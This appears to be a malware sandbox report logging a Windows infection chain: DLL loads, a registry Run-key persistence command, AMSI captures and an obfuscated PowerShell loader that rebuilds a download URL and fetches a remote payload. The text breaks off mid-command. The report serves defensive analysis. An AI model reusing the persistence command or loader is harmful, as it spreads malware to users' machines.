              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32 source: powershell.exe, 00000006.00000002.1609854802.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000006.00000002.1577977343.00000000005EE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandlerV source: powershell.exe, 00000006.00000002.1609854802.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match | File source: 0000000F.00000002.2216062150.0000000004301000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.1619238157.0000000008991000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.1618891964.00000000081F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.1602163136.000000000545A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.1243751229.0000027592CBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Gribben)$GlobaL:kURsgevInst = [SysTem.tExt.ENcoDInG]::AsCII.geTStrinG($IsOLaTIonSmatERiaLes)$gLoBAl:HAvEMnd=$kuRSgEvInst.SuBStRINg($DESPeRaNCe,$poSSESsIOnaTE)<#Unsaintlike Umenneskel
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Attakerede $Didoes $Koloniser), (Gdninger @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Merychippus202 = [AppDomain]::CurrentDomain.GetAssemblies()$globa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tiphiidae)), $Ekstrabevillingen).DefineDynamicModule($Delspecifikationens, $false).DefineType($Pendulums, $Teologernes, [System.Multic
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Gribben)$GlobaL:kURsgevInst = [SysTem.tExt.ENcoDInG]::AsCII.geTStrinG($IsOLaTIonSmatERiaLes)$gLoBAl:HAvEMnd=$kuRSgEvInst.SuBStRINg($DESPeRaNCe,$poSSESsIOnaTE)<#Unsaintlike Umenneskel
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. 
vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM 